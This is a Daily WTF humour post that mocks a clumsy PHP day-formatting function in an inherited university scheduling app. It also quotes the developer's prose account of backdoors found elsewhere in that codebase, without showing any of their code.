CodeSOD: Weakly Courses

Kerin inherited a scheduling application for a university. This application stored the scheduled days for a class in the database… as one comma-separated field. This was a problem for Kerin, who was hired to add predictive scheduling and classroom density measurements to the system.

This particular function was written to take that data and transform it for display. Sort of.

function getDaysEnrollment($DayStr){ $Days = explode(',',$DayStr); $StrDay = ""; if(sizeof($Days)>0){ foreach($Days as $day) { switch($day) { case 'M': $StrDay .=" Mon,"; break; case 'T': $StrDay .=" Tue,"; break; case 'W': $StrDay .=" Wen,"; break; case 'TH': $StrDay .=" Thu,"; break; case 'F': $StrDay .=" Fri,"; break; } } $StrDay = substr($StrDay,0,-1); } return $StrDay; }

So, at its core, this function wants to loop through the list of days and convert them from short abbreviatiosn, like "M", to longer abbreviations, like "Mon". It then keeps concatenating each one together, but with a twist- it strips the commas. $StrDay = substr($StrDay,0,-1); rips off the last character, which would be the comma. Except they hard coaded the comma into the strings they're concatenating in the first place. It's completely superfluous. There's no need for that, they could have just not done the commas.

According to Kerrin, this isn't the worst thing in the code, but it is the "punchiest". I'll let Kerin explain some of the things in this codebase:

[I found this] nestled in amongst mountains of similarly-awful code, Slovenian-language comments, and - I'm being completely serious here - executing code loaded from a text file remote, foreign-language MMORPG blog's domain.
If I were to hazard a guess, the remote code is probably insurance - there were a couple other similar tricks like a concealed PHP shell and an emailer that phones home with the current admin details if the IP address changes.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

This post originally appeared on The Daily WTF.

Leave a Reply

Your email address will not be published.